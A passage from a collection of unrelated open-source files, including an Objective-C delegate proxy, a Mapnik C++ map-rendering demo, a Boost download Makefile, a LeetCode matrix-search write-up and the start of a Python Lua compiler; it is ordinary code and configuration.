        struct objc_method_description method = pMethods[i];
        if (RX_is_method_with_description_void(method)) {
            [selectors addObject:SEL_VALUE(method.name)];
        }
    }

    // protocol_copyMethodDescriptionList/class lists are malloc'd by the
    // runtime and must be freed by the caller.
    free(pMethods);

    unsigned int numberOfBaseProtocols = 0;
    Protocol * __unsafe_unretained * pSubprotocols = protocol_copyProtocolList(protocol, &numberOfBaseProtocols);

    for (unsigned int i = 0; i < numberOfBaseProtocols; ++i) {
        [selectors unionSet:[self collectVoidSelectorsForProtocol:pSubprotocols[i]]];
    }

    free(pSubprotocols);

    return selectors;
}

// Gathers the void delegate selectors for this class by walking its whole
// superclass chain and every protocol each class adopts, then caches the
// result in voidSelectorsPerClass.
+(void)initialize {
    @synchronized (_RXDelegateProxy.class) {
        if (voidSelectorsPerClass == nil) {
            voidSelectorsPerClass = [[NSMutableDictionary alloc] init];
        }

        NSMutableSet *voidSelectors = [NSMutableSet set];

// Guard against a pathological (e.g. cyclic-looking) superclass chain.
#define CLASS_HIERARCHY_MAX_DEPTH 100

        NSInteger classHierarchyDepth = 0;
        Class targetClass = NULL;

        for (classHierarchyDepth = 0, targetClass = self;
             classHierarchyDepth < CLASS_HIERARCHY_MAX_DEPTH && targetClass != nil;
             ++classHierarchyDepth, targetClass = class_getSuperclass(targetClass)
            ) {
            unsigned int count;
            Protocol *__unsafe_unretained *pProtocols = class_copyProtocolList(targetClass, &count);

            for (unsigned int i = 0; i < count; i++) {
                NSSet *selectorsForProtocol = [self collectVoidSelectorsForProtocol:pProtocols[i]];
                [voidSelectors unionSet:selectorsForProtocol];
            }

            free(pProtocols);
        }

        if (classHierarchyDepth == CLASS_HIERARCHY_MAX_DEPTH) {
            NSLog(@"Detected weird class hierarchy with depth over %d. Starting with this class -> %@", CLASS_HIERARCHY_MAX_DEPTH, self);
#if DEBUG
            abort();
#endif
        }

        voidSelectorsPerClass[CLASS_VALUE(self)] = voidSelectors;
    }
}

// Accessor for the weakly held forwarded delegate.
-(id)_forwardToDelegate {
    return __forwardToDelegate;
}

// Sets the delegate that un-handled messages are forwarded to; optionally
// retains it by mirroring the reference into strongForwardDelegate.
-(void)_setForwardToDelegate:(id __nullable)forwardToDelegate retainDelegate:(BOOL)retainDelegate {
    __forwardToDelegate = forwardToDelegate;
    if (retainDelegate) {
        self.strongForwardDelegate = forwardToDelegate;
    }
    else {
        self.strongForwardDelegate = nil;
    }
}

// YES when this proxy (or a superclass) provides a real implementation for
// `selector`, as opposed to handling it via message forwarding.
-(BOOL)hasWiredImplementationForSelector:(SEL)selector {
    return [super respondsToSelector:selector];
}

// YES when `selector` is one of the void-returning delegate methods
// collected for this class in +initialize.
-(BOOL)voidDelegateMethodsContain:(SEL)selector {
    @synchronized(_RXDelegateProxy.class) {
        NSSet *voidSelectors = voidSelectorsPerClass[CLASS_VALUE(self.class)];
        NSAssert(voidSelectors != nil, @"Set of allowed methods not initialized");
        return [voidSelectors containsObject:SEL_VALUE(selector)];
    }
}

// For void delegate methods: notifies _sentMessage BEFORE forwarding to the
// real delegate and _methodInvoked AFTER, so observers see both phases.
// Non-void methods are only forwarded.
-(void)forwardInvocation:(NSInvocation *)anInvocation {
    BOOL isVoid = RX_is_method_signature_void(anInvocation.methodSignature);
    NSArray *arguments = nil;
    if (isVoid) {
        arguments = RX_extract_arguments(anInvocation);
        [self _sentMessage:anInvocation.selector withArguments:arguments];
    }

    if (self._forwardToDelegate && [self._forwardToDelegate respondsToSelector:anInvocation.selector]) {
        [anInvocation invokeWithTarget:self._forwardToDelegate];
    }

    if (isVoid) {
        [self _methodInvoked:anInvocation.selector withArguments:arguments];
    }
}

// abstract method — subclasses override to observe messages pre-forwarding.
-(void)_sentMessage:(SEL)selector withArguments:(NSArray *)arguments {

}

// abstract method — subclasses override to observe messages post-forwarding.
-(void)_methodInvoked:(SEL)selector withArguments:(NSArray *)arguments {

}

// Intentionally empty; no manual cleanup is performed here.
-(void)dealloc {
}

@end
| {
"pile_set_name": "Github"
} |
/*
*
* Copyright (c) 2013 - 2020 Lijun Liao
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.xipki.scep.util;
/**
* SCEP constants.
*
* @author Lijun Liao
*/
public class ScepConstants {
public static final String CT_X509_NEXT_CA_CERT = "application/x-x509-next-ca-cert";
public static final String CT_X509_CA_CERT = "application/x-x509-ca-cert";
public static final String CT_X509_CA_RA_CERT = "application/x-x509-ca-ra-cert";
public static final String CT_PKI_MESSAGE = "application/x-pki-message";
public static final String CT_TEXT_PLAIN = "text/plain";
private ScepConstants() {
}
}
| {
"pile_set_name": "Github"
} |
a,b{p:v}
| {
"pile_set_name": "Github"
} |
{
"created_at": "2015-02-27T22:27:40.765097",
"description": "WoW 5.0 web-based Spreadsheet",
"fork": false,
"full_name": "cheald/shadowcraft-ui",
"language": "JavaScript",
"updated_at": "2015-02-27T23:41:45.722764"
} | {
"pile_set_name": "Github"
} |
/*****************************************************************************
*
* This file is part of Mapnik (c++ mapping toolkit)
*
* Copyright (C) 2017 Artem Pavlenko
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*
*****************************************************************************/
#include <mapnik/map.hpp>
#include <mapnik/layer.hpp>
#include <mapnik/rule.hpp>
#include <mapnik/feature_type_style.hpp>
#include <mapnik/symbolizer.hpp>
#include <mapnik/text/placements/dummy.hpp>
#include <mapnik/text/text_properties.hpp>
#include <mapnik/text/formatting/text.hpp>
#include <mapnik/datasource_cache.hpp>
#include <mapnik/font_engine_freetype.hpp>
#include <mapnik/agg_renderer.hpp>
#include <mapnik/expression.hpp>
#include <mapnik/color_factory.hpp>
#include <mapnik/image_util.hpp>
#include <mapnik/unicode.hpp>
#include <mapnik/save_map.hpp>
#include <mapnik/cairo_io.hpp>
#if defined(HAVE_CAIRO)
#include <mapnik/cairo/cairo_renderer.hpp>
#include <mapnik/cairo/cairo_image_util.hpp>
#endif
#include <iostream>
int main ( int, char** )
{
using namespace mapnik;
const std::string srs_lcc="+proj=lcc +ellps=GRS80 +lat_0=49 +lon_0=-95 +lat+1=49 +lat_2=77 +datum=NAD83 +units=m +no_defs";
const std::string srs_merc="+proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0.0 +k=1.0 +units=m +nadgrids=@null +wktext +no_defs +over";
try {
std::cout << " running demo ... \n";
datasource_cache::instance().register_datasources("plugins/input/");
freetype_engine::register_font("fonts/dejavu-fonts-ttf-2.37/ttf/DejaVuSans.ttf");
Map m(800,600);
m.set_background(parse_color("white"));
m.set_srs(srs_merc);
// create styles
// Provinces (polygon)
feature_type_style provpoly_style;
provpoly_style.reserve(2); // prevent reallocation and copying in add_rule
{
rule r;
r.set_filter(parse_expression("[NAME_EN] = 'Ontario'"));
{
polygon_symbolizer poly_sym;
put(poly_sym, keys::fill, color(250, 190, 183));
r.append(std::move(poly_sym));
}
provpoly_style.add_rule(std::move(r));
}
{
rule r;
r.set_filter(parse_expression("[NOM_FR] = 'Québec'"));
{
polygon_symbolizer poly_sym;
put(poly_sym, keys::fill, color(217, 235, 203));
r.append(std::move(poly_sym));
}
provpoly_style.add_rule(std::move(r));
}
m.insert_style("provinces", std::move(provpoly_style));
// Provinces (polyline)
feature_type_style provlines_style;
{
rule r;
{
line_symbolizer line_sym;
put(line_sym,keys::stroke,color(0,0,0));
put(line_sym,keys::stroke_width,1.0);
dash_array dash;
dash.emplace_back(8,4);
dash.emplace_back(2,2);
dash.emplace_back(2,2);
put(line_sym,keys::stroke_dasharray,dash);
r.append(std::move(line_sym));
}
provlines_style.add_rule(std::move(r));
}
m.insert_style("provlines", std::move(provlines_style));
// Drainage
feature_type_style qcdrain_style;
{
rule r;
r.set_filter(parse_expression("[HYC] = 8"));
{
polygon_symbolizer poly_sym;
put(poly_sym, keys::fill, color(153, 204, 255));
r.append(std::move(poly_sym));
}
qcdrain_style.add_rule(std::move(r));
}
m.insert_style("drainage", std::move(qcdrain_style));
// Roads 3 and 4 (The "grey" roads)
feature_type_style roads34_style;
{
rule r;
r.set_filter(parse_expression("[CLASS] = 3 or [CLASS] = 4"));
{
line_symbolizer line_sym;
put(line_sym,keys::stroke,color(171,158,137));
put(line_sym,keys::stroke_width,2.0);
put(line_sym,keys::stroke_linecap,ROUND_CAP);
put(line_sym,keys::stroke_linejoin,ROUND_JOIN);
r.append(std::move(line_sym));
}
roads34_style.add_rule(std::move(r));
}
m.insert_style("smallroads", std::move(roads34_style));
// Roads 2 (The thin yellow ones)
feature_type_style roads2_style_1;
{
rule r;
r.set_filter(parse_expression("[CLASS] = 2"));
{
line_symbolizer line_sym;
put(line_sym,keys::stroke,color(171,158,137));
put(line_sym,keys::stroke_width,4.0);
put(line_sym,keys::stroke_linecap,ROUND_CAP);
put(line_sym,keys::stroke_linejoin,ROUND_JOIN);
r.append(std::move(line_sym));
}
roads2_style_1.add_rule(std::move(r));
}
m.insert_style("road-border", std::move(roads2_style_1));
feature_type_style roads2_style_2;
{
rule r;
r.set_filter(parse_expression("[CLASS] = 2"));
{
line_symbolizer line_sym;
put(line_sym,keys::stroke,color(255,250,115));
put(line_sym,keys::stroke_width,2.0);
put(line_sym,keys::stroke_linecap,ROUND_CAP);
put(line_sym,keys::stroke_linejoin,ROUND_JOIN);
r.append(std::move(line_sym));
}
roads2_style_2.add_rule(std::move(r));
}
m.insert_style("road-fill", std::move(roads2_style_2));
// Roads 1 (The big orange ones, the highways)
feature_type_style roads1_style_1;
{
rule r;
r.set_filter(parse_expression("[CLASS] = 1"));
{
line_symbolizer line_sym;
put(line_sym,keys::stroke,color(188,149,28));
put(line_sym,keys::stroke_width,7.0);
put(line_sym,keys::stroke_linecap,ROUND_CAP);
put(line_sym,keys::stroke_linejoin,ROUND_JOIN);
r.append(std::move(line_sym));
}
roads1_style_1.add_rule(std::move(r));
}
m.insert_style("highway-border", std::move(roads1_style_1));
feature_type_style roads1_style_2;
{
rule r;
r.set_filter(parse_expression("[CLASS] = 1"));
{
line_symbolizer line_sym;
put(line_sym,keys::stroke,color(242,191,36));
put(line_sym,keys::stroke_width,5.0);
put(line_sym,keys::stroke_linecap,ROUND_CAP);
put(line_sym,keys::stroke_linejoin,ROUND_JOIN);
r.append(std::move(line_sym));
}
roads1_style_2.add_rule(std::move(r));
}
m.insert_style("highway-fill", std::move(roads1_style_2));
// Populated Places
feature_type_style popplaces_style;
{
rule r;
{
text_symbolizer text_sym;
text_placements_ptr placement_finder = std::make_shared<text_placements_dummy>();
placement_finder->defaults.format_defaults.face_name = "DejaVu Sans Book";
placement_finder->defaults.format_defaults.text_size = 10.0;
placement_finder->defaults.format_defaults.fill = color(0,0,0);
placement_finder->defaults.format_defaults.halo_fill = color(255,255,200);
placement_finder->defaults.format_defaults.halo_radius = 1.0;
placement_finder->defaults.set_format_tree(std::make_shared<mapnik::formatting::text_node>(parse_expression("[GEONAME]")));
put<text_placements_ptr>(text_sym, keys::text_placements_, placement_finder);
r.append(std::move(text_sym));
}
popplaces_style.add_rule(std::move(r));
}
m.insert_style("popplaces", std::move(popplaces_style));
// layers
// Provincial polygons
{
parameters p;
p["type"]="shape";
p["file"]="demo/data/boundaries";
p["encoding"]="utf8";
layer lyr("Provinces");
lyr.set_datasource(datasource_cache::instance().create(p));
lyr.add_style("provinces");
lyr.set_srs(srs_lcc);
m.add_layer(lyr);
}
// Drainage
{
parameters p;
p["type"]="shape";
p["file"]="demo/data/qcdrainage";
layer lyr("Quebec Hydrography");
lyr.set_datasource(datasource_cache::instance().create(p));
lyr.set_srs(srs_lcc);
lyr.add_style("drainage");
m.add_layer(lyr);
}
{
parameters p;
p["type"]="shape";
p["file"]="demo/data/ontdrainage";
layer lyr("Ontario Hydrography");
lyr.set_datasource(datasource_cache::instance().create(p));
lyr.set_srs(srs_lcc);
lyr.add_style("drainage");
m.add_layer(lyr);
}
// Provincial boundaries
{
parameters p;
p["type"]="shape";
p["file"]="demo/data/boundaries_l";
layer lyr("Provincial borders");
lyr.set_srs(srs_lcc);
lyr.set_datasource(datasource_cache::instance().create(p));
lyr.add_style("provlines");
m.add_layer(lyr);
}
// Roads
{
parameters p;
p["type"]="shape";
p["file"]="demo/data/roads";
layer lyr("Roads");
lyr.set_srs(srs_lcc);
lyr.set_datasource(datasource_cache::instance().create(p));
lyr.add_style("smallroads");
lyr.add_style("road-border");
lyr.add_style("road-fill");
lyr.add_style("highway-border");
lyr.add_style("highway-fill");
m.add_layer(lyr);
}
// popplaces
{
parameters p;
p["type"]="shape";
p["file"]="demo/data/popplaces";
p["encoding"] = "utf8";
layer lyr("Populated Places");
lyr.set_srs(srs_lcc);
lyr.set_datasource(datasource_cache::instance().create(p));
lyr.add_style("popplaces");
m.add_layer(lyr);
}
m.zoom_to_box(box2d<double>(-8024477.28459,5445190.38849,-7381388.20071,5662941.44855));
image_rgba8 buf(m.width(),m.height());
agg_renderer<image_rgba8> ren(m,buf);
ren.apply();
std::string msg("These maps have been rendered using AGG in the current directory:\n");
#ifdef HAVE_JPEG
save_to_file(buf,"demo.jpg","jpeg");
msg += "- demo.jpg\n";
#endif
#ifdef HAVE_PNG
save_to_file(buf,"demo.png","png");
save_to_file(buf,"demo256.png","png8");
msg += "- demo.png\n";
msg += "- demo256.png\n";
#endif
#ifdef HAVE_TIFF
save_to_file(buf,"demo.tif","tiff");
msg += "- demo.tif\n";
#endif
#ifdef HAVE_WEBP
save_to_file(buf,"demo.webp","webp");
msg += "- demo.webp\n";
#endif
msg += "Have a look!\n";
std::cout << msg;
#if defined(HAVE_CAIRO)
// save to pdf/svg files
save_to_cairo_file(m,"cairo-demo.pdf");
save_to_cairo_file(m,"cairo-demo.svg");
/* we could also do:
save_to_cairo_file(m,"cairo-demo.png");
but instead let's build up a surface for more flexibility
*/
cairo_surface_ptr image_surface(
cairo_image_surface_create(CAIRO_FORMAT_ARGB32,m.width(),m.height()),
cairo_surface_closer());
double scale_factor = 1.0;
cairo_ptr image_context(create_context(image_surface));
mapnik::cairo_renderer<cairo_ptr> png_render(m,image_context,scale_factor);
png_render.apply();
// we can now write to png with cairo functionality
cairo_surface_write_to_png(&*image_surface, "cairo-demo.png");
// but we can also benefit from quantization by converting
// to a mapnik image object and then saving that
mapnik::image_rgba8 im_data(cairo_image_surface_get_width(&*image_surface), cairo_image_surface_get_height(&*image_surface));
cairo_image_to_rgba8(im_data, image_surface);
save_to_file(im_data, "cairo-demo256.png","png8");
cairo_surface_finish(&*image_surface);
std::cout << "Three maps have been rendered using Cairo in the current directory:\n"
"- cairo-demo.png\n"
"- cairo-demo256.png\n"
"- cairo-demo.pdf\n"
"- cairo-demo.svg\n"
"Have a look!\n";
#endif
// save map definition (data + style)
save_map(m, "map.xml");
}
catch ( std::exception const& ex )
{
std::cerr << "### std::exception: " << ex.what() << std::endl;
return EXIT_FAILURE;
}
catch ( ... )
{
std::cerr << "### Unknown exception." << std::endl;
return EXIT_FAILURE;
}
return EXIT_SUCCESS;
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0"?>
<configuration>
<appSettings>
<add key="WebHostUrl2" value="http://mono.servicestack.net/docs/"/>
<add key="WebHostUrl" value="http://localhost:5416/"/>
</appSettings>
<!--
For a description of web.config changes see http://go.microsoft.com/fwlink/?LinkId=235367.
The following attributes can be set on the <httpRuntime> tag.
<system.Web>
<httpRuntime targetFramework="4.5" />
</system.Web>
-->
<system.web>
<httpHandlers>
<add path="*" type="ServiceStack.HttpHandlerFactory, ServiceStack" verb="*"/>
</httpHandlers>
<compilation debug="true" targetFramework="4.5">
<assemblies/>
</compilation>
<pages controlRenderingCompatibilityVersion="3.5" clientIDMode="AutoID"/>
</system.web>
<system.webServer>
<validation validateIntegratedModeConfiguration="false"/>
<handlers>
<add path="*" name="ServiceStack.Factory" type="ServiceStack.HttpHandlerFactory, ServiceStack" verb="*" preCondition="integratedMode" resourceType="Unspecified" allowPathInfo="true"/>
</handlers>
</system.webServer>
</configuration> | {
"pile_set_name": "Github"
} |
--TEST--
Vector-matrix multiplication test (column-major)
--FILE--
<?php
ini_set("qb.column_major_matrix", true);
/**
* @engine qb
* @local matrix2x4 $m
* @local vector2 $v
*/
function test_function() {
	// Storage is column-major (see the ini_set above): each inner
	// array is one storage row, so $m represents the 2x4 matrix with
	// columns (1,2,3,4) and (5,6,7,8).
	$m = array( array(1, 5),
				array(2, 6),
				array(3, 7),
				array(4, 8) );
	$v = array( 2, 4 );
	// Vector-matrix product; the --EXPECT-- section pins the result
	// to [22, 28, 34, 40].
	echo $v * $m, "\n";
}
test_function();
?>
--EXPECT--
[22, 28, 34, 40]
| {
"pile_set_name": "Github"
} |
<!--
~ Copyright (C) 2015 The Android Open Source Project
~
~ Licensed under the Apache License, Version 2.0 (the "License");
~ you may not use this file except in compliance with the License.
~ You may obtain a copy of the License at
~
~ http://www.apache.org/licenses/LICENSE-2.0
~
~ Unless required by applicable law or agreed to in writing, software
~ distributed under the License is distributed on an "AS IS" BASIS,
~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
~ See the License for the specific language governing permissions and
~ limitations under the License
-->
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="com.android.test.hierarchyviewer">
<application>
<uses-library android:name="android.test.runner" />
<activity
android:name=".MainActivity"
android:label="HvTest" >
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
</application>
<instrumentation
android:name="android.test.InstrumentationTestRunner"
android:targetPackage="com.android.test.hierarchyviewer" />
</manifest>
| {
"pile_set_name": "Github"
} |
## 题目地址
https://leetcode.com/problems/search-a-2d-matrix-ii/description/
## 题目描述
```
Write an efficient algorithm that searches for a value in an m x n matrix. This matrix has the following properties:
Integers in each row are sorted in ascending from left to right.
Integers in each column are sorted in ascending from top to bottom.
Example:
Consider the following matrix:
[
[1, 4, 7, 11, 15],
[2, 5, 8, 12, 19],
[3, 6, 9, 16, 22],
[10, 13, 14, 17, 24],
[18, 21, 23, 26, 30]
]
Given target = 5, return true.
Given target = 20, return false.
```
## 前置知识
- 数组
## 公司
- 阿里
- 腾讯
- 百度
- 字节
## 思路
符合直觉的做法是两层循环遍历,时间复杂度是O(m * n),
有没有时间复杂度更好的做法呢? 答案是有,那就是充分运用矩阵的特性(横向纵向都递增),
我们可以从角落(左下或者右上)开始遍历,这样时间复杂度是O(m + n).

其中蓝色代表我们选择的起点元素, 红色代表目标元素。
## 关键点解析
- 从角落开始遍历,利用递增的特性简化时间复杂度
## 代码
代码支持:JavaScript, Python3
JavaScript Code:
```js
/*
* @lc app=leetcode id=240 lang=javascript
*
* [240] Search a 2D Matrix II
*
* https://leetcode.com/problems/search-a-2d-matrix-ii/description/
*
*
*/
/**
* @param {number[][]} matrix
* @param {number} target
* @return {boolean}
*/
var searchMatrix = function(matrix, target) {
if (!matrix || matrix.length === 0) return false;
let colIndex = 0;
let rowIndex = matrix.length - 1;
while(rowIndex > 0 && target < matrix[rowIndex][colIndex]) {
rowIndex --;
}
while(colIndex < matrix[0].length) {
if (target === matrix[rowIndex][colIndex]) return true;
if (target > matrix[rowIndex][colIndex]) {
colIndex ++;
} else if (rowIndex > 0){
rowIndex --;
} else {
return false;
}
}
return false;
};
```
Python Code:
```python
class Solution:
def searchMatrix(self, matrix, target):
m = len(matrix)
if m == 0:
return False
n = len(matrix[0])
i = m - 1
j = 0
while i >= 0 and j < n:
if matrix[i][j] == target:
return True
if matrix[i][j] > target:
i -= 1
else:
j += 1
return False
```
| {
"pile_set_name": "Github"
} |
#
# TinCanTools Flyswatter
#
# http://www.tincantools.com/product.php?productid=16134
#
interface ft2232
ft2232_device_desc "Flyswatter"
ft2232_layout "flyswatter"
ft2232_vid_pid 0x0403 0x6010
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<Project Sdk="Microsoft.NET.Sdk">
<PropertyGroup>
<TargetFrameworks>net452;net462</TargetFrameworks>
<IsPackable>false</IsPackable>
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
<Configurations>Debug;Release</Configurations>
<Platforms>AnyCPU;x86;x64</Platforms>
</PropertyGroup>
<ItemGroup>
<ProjectReference Include="..\K4os.Compression.LZ4.vPrev\K4os.Compression.LZ4.vPrev.csproj" />
<ProjectReference Include="..\K4os.Compression.LZ4\K4os.Compression.LZ4.csproj" />
<ProjectReference Include="..\TestHelpers\TestHelpers.csproj" />
</ItemGroup>
<Import Project="..\..\.paket\Paket.Restore.targets" />
</Project> | {
"pile_set_name": "Github"
} |
//
// OOAttandanceTotalItemCell.swift
// O2Platform
//
// Created by 刘振兴 on 2018/5/23.
// Copyright © 2018年 zoneland. All rights reserved.
//
import UIKit
/// Table-view cell showing one attendance (check-in) record: a colored
/// status badge plus the record date and the on/off-duty times.
class OOAttandanceTotalItemCell: UITableViewCell,Configurable {
    /// Status badge ("迟"/"早"/"假"/"正") rendered as a rounded label.
    @IBOutlet weak var iconLabel: UILabel!
    /// Date of the attendance record.
    @IBOutlet weak var checkinDateLabel: UILabel!
    /// Clock-in (on-duty) time.
    @IBOutlet weak var startTimeLabel: UILabel!
    /// Clock-out (off-duty) time.
    @IBOutlet weak var endTimeLabel: UILabel!

    override func awakeFromNib() {
        super.awakeFromNib()
        // Round the badge's corners once the nib has been loaded.
        iconLabel.layer.cornerRadius = 10
        iconLabel.layer.masksToBounds = true
    }

    override func setSelected(_ selected: Bool, animated: Bool) {
        super.setSelected(selected, animated: animated)
        // Configure the view for the selected state
    }

    /// Populates the cell from an `OOAttandanceCheckinTotal` record;
    /// items of any other type are silently ignored.
    func config(withItem item: Any?) {
        guard let model = item as? OOAttandanceCheckinTotal else {
            return
        }
        checkinDateLabel.text = model.recordDateString
        startTimeLabel.text = model.onDutyTime
        endTimeLabel.text = model.offDutyTime
        // Badge text/color by status, checked in priority order:
        // late (orange), left early (purple), on leave (blue),
        // normal (red).
        if model.isLate == true {
            self.iconLabel.text = "迟"
            self.iconLabel.backgroundColor = UIColor(hex: "#F5A623")
        }else if model.isLeaveEarlier == true {
            self.iconLabel.text = "早"
            self.iconLabel.backgroundColor = UIColor(hex: "#AC71E3")
        }else if model.isGetSelfHolidays == true {
            self.iconLabel.text = "假"
            self.iconLabel.backgroundColor = UIColor(hex: "#4FB2E3")
        }else {
            self.iconLabel.text = "正"
            self.iconLabel.backgroundColor = UIColor(hex: "#FB4747")
        }
    }
}
| {
"pile_set_name": "Github"
} |
# Boost release tarball: primary CDN plus a SourceForge fallback.
BOOST_URL = https://dl.bintray.com/boostorg/release/1.74.0/source/boost_1_74_0.tar.bz2
BOOST_ALTERNATIVE_URL = https://sourceforge.net/projects/boost/files/boost/1.74.0/boost_1_74_0.tar.bz2/download
# NOTE(review): this value is 64 hex digits, i.e. a SHA-256 digest,
# not an MD5 sum -- presumably build/download.py verifies it as such;
# confirm and consider renaming the variable.
BOOST_MD5 = 83bfc1507731a0906e387fc28b7ef5417d591429e51e788417fe9ff025e116b1
# Names derived from the URL so a version bump only touches the
# settings above.
BOOST_TARBALL_NAME = $(notdir $(BOOST_URL))
BOOST_TARBALL = $(DOWNLOAD_DIR)/$(BOOST_TARBALL_NAME)
BOOST_BASE_NAME = $(patsubst %.tar.bz2,%,$(BOOST_TARBALL_NAME))
BOOST_SRC = $(OUT)/src/$(BOOST_BASE_NAME)
# Quilt patch series applied on top of the unpacked sources.
BOOST_PATCHES_DIR = $(topdir)/lib/boost/patches
BOOST_PATCHES = $(addprefix $(BOOST_PATCHES_DIR)/,$(shell cat $(BOOST_PATCHES_DIR)/series))

# Fetch the tarball (checksum-verified by build/download.py).
$(BOOST_TARBALL): | $(DOWNLOAD_DIR)/dirstamp
	@$(NQ)echo " GET $@"
	$(Q)./build/download.py $(BOOST_URL) $(BOOST_ALTERNATIVE_URL) $(BOOST_MD5) $(DOWNLOAD_DIR)

# Unpack and patch, guarded by a stamp file so it happens only once
# per version; re-runs if the tarball or the patch series changes.
BOOST_UNTAR_STAMP = $(OUT)/src/stamp-$(BOOST_BASE_NAME)
$(BOOST_UNTAR_STAMP): $(BOOST_TARBALL) $(BOOST_PATCHES_DIR)/series $(BOOST_PATCHES) | $(OUT)/src/dirstamp
	@$(NQ)echo " UNTAR $(BOOST_TARBALL_NAME)"
	$(Q)rm -rf $(BOOST_SRC)
	$(Q)tar xjfC $< $(OUT)/src
	$(Q)cd $(BOOST_SRC) && QUILT_PATCHES=$(abspath $(BOOST_PATCHES_DIR)) quilt push -a -q
	@touch $@

.PHONY: boost
boost: $(BOOST_UNTAR_STAMP)

# We use only the header-only Boost libraries, so no linker flags
# required.
BOOST_LDLIBS =

# reduce Boost header bloat a bit
BOOST_CPPFLAGS = -isystem $(OUT)/src/$(BOOST_BASE_NAME)
BOOST_CPPFLAGS += -DBOOST_NO_IOSTREAM -DBOOST_MATH_NO_LEXICAL_CAST
BOOST_CPPFLAGS += -DBOOST_UBLAS_NO_STD_CERR
BOOST_CPPFLAGS += -DBOOST_ERROR_CODE_HEADER_ONLY
BOOST_CPPFLAGS += -DBOOST_SYSTEM_NO_DEPRECATED
BOOST_CPPFLAGS += -DBOOST_NO_STD_LOCALE -DBOOST_LEXICAL_CAST_ASSUME_C_LOCALE
| {
"pile_set_name": "Github"
} |
{
"images" : [
{
"size" : "20x20",
"idiom" : "iphone",
"filename" : "[email protected]",
"scale" : "2x"
},
{
"size" : "20x20",
"idiom" : "iphone",
"filename" : "[email protected]",
"scale" : "3x"
},
{
"size" : "29x29",
"idiom" : "iphone",
"filename" : "[email protected]",
"scale" : "1x"
},
{
"size" : "29x29",
"idiom" : "iphone",
"filename" : "[email protected]",
"scale" : "2x"
},
{
"size" : "29x29",
"idiom" : "iphone",
"filename" : "[email protected]",
"scale" : "3x"
},
{
"size" : "40x40",
"idiom" : "iphone",
"filename" : "[email protected]",
"scale" : "2x"
},
{
"size" : "40x40",
"idiom" : "iphone",
"filename" : "[email protected]",
"scale" : "3x"
},
{
"size" : "60x60",
"idiom" : "iphone",
"filename" : "[email protected]",
"scale" : "2x"
},
{
"size" : "60x60",
"idiom" : "iphone",
"filename" : "[email protected]",
"scale" : "3x"
},
{
"size" : "20x20",
"idiom" : "ipad",
"filename" : "[email protected]",
"scale" : "1x"
},
{
"size" : "20x20",
"idiom" : "ipad",
"filename" : "[email protected]",
"scale" : "2x"
},
{
"size" : "29x29",
"idiom" : "ipad",
"filename" : "[email protected]",
"scale" : "1x"
},
{
"size" : "29x29",
"idiom" : "ipad",
"filename" : "[email protected]",
"scale" : "2x"
},
{
"size" : "40x40",
"idiom" : "ipad",
"filename" : "[email protected]",
"scale" : "1x"
},
{
"size" : "40x40",
"idiom" : "ipad",
"filename" : "[email protected]",
"scale" : "2x"
},
{
"size" : "76x76",
"idiom" : "ipad",
"filename" : "[email protected]",
"scale" : "1x"
},
{
"size" : "76x76",
"idiom" : "ipad",
"filename" : "[email protected]",
"scale" : "2x"
},
{
"size" : "83.5x83.5",
"idiom" : "ipad",
"filename" : "[email protected]",
"scale" : "2x"
},
{
"size" : "1024x1024",
"idiom" : "ios-marketing",
"filename" : "[email protected]",
"scale" : "1x"
}
],
"info" : {
"version" : 1,
"author" : "xcode"
}
}
| {
"pile_set_name": "Github"
} |
from lua_exp import *
from func_info import FuncInfo
from lua_token import TokenKind
from lua_opcode import OpCode
class ArgAndKind:
    """Simple pair of an operand value (`arg`) and its kind tag (`kind`)."""

    def __init__(self, arg, kind):
        self.arg, self.kind = arg, kind
class CodegenExp:
    """Compiles Lua expression AST nodes into VM instructions.

    All methods are static. `fi` is the FuncInfo of the function being
    compiled, `a` the target register for the expression's value(s),
    and `n` (where present) the number of results wanted (-1 = all).
    """

    @staticmethod
    def process_exp(fi, exp, a, n):
        # Dispatch on the concrete AST node type; each branch leaves
        # the expression's result(s) starting at register `a`.
        if isinstance(exp, NilExp):
            fi.emit_load_nil(a, n)
        elif isinstance(exp, FalseExp):
            fi.emit_load_bool(a, 0, 0)
        elif isinstance(exp, TrueExp):
            fi.emit_load_bool(a, 1, 0)
        elif isinstance(exp, IntegerExp):
            fi.emit_load_k(a, exp.val)
        elif isinstance(exp, FloatExp):
            fi.emit_load_k(a, exp.val)
        elif isinstance(exp, StringExp):
            fi.emit_load_k(a, exp.s)
        elif isinstance(exp, ParensExp):
            # Parentheses truncate a multi-value expression to exactly
            # one value, hence n=1.
            CodegenExp.process_exp(fi, exp.exp, a, 1)
        elif isinstance(exp, VarArgExp):
            CodegenExp.process_vararg_exp(fi, a, n)
        elif isinstance(exp, FuncDefExp):
            CodegenExp.process_func_def_exp(fi, exp, a)
        elif isinstance(exp, TableConstructorExp):
            CodegenExp.process_table_constructor_exp(fi, exp, a)
        elif isinstance(exp, UnopExp):
            CodegenExp.process_unop_exp(fi, exp, a)
        elif isinstance(exp, BinopExp):
            CodegenExp.process_binop_exp(fi, exp, a)
        elif isinstance(exp, ConcatExp):
